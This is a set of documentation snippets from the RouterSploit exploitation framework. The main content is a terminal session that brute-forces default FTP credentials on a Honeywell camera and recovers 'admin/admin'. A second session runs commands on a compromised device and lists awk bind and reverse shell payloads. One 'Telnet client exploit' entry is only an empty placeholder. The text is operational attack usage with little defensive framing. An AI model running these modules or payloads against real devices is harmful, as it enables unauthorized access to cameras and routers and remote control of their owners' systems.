--------------------------------
### Telnet Client Example Exploit
Source: https://github.com/threat9/routersploit/wiki/Telnet-Client
This is a placeholder for an exploit that utilizes Telnet communication as a client. Specific implementation details would follow.
```python
```
--------------------------------
### Honeywell Camera FTP Default Creds Module Execution
Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/honeywell/ftp_default_creds.md
Demonstrates the command-line usage for the Honeywell Camera FTP Default Creds module. It shows how to select the module, set the target IP address, and run the attack.
```bash
rsf > use creds/cameras/honeywell/ftp_default_creds
rsf (Honeywell Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
--------------------------------
### Execute Commands and Show Payloads
Source: https://github.com/threat9/routersploit/wiki/Exploiting-Target
After gaining initial access, use this to execute commands on the target and view available payloads for further exploitation. Ensure you have a command loop active.
```text
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload ' commands.
cmd > uname -a
[*] Executing 'uname -a' on the device...
Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i386 GNU/Linux
cmd > show payloads
[*] Available payloads:
Payload Name Description
------- ---- -----------
awk_bind_udp Awk Bind UDP Creates an interactive udp bind shell by using (g)awk.
awk_bind_tcp Awk Bind TCP Creates an interactive tcp bind shell by using (g)awk.
awk_reverse_tcp Awk Reverse TCP Creates an interactive tcp reverse shell by using (g)awk.
```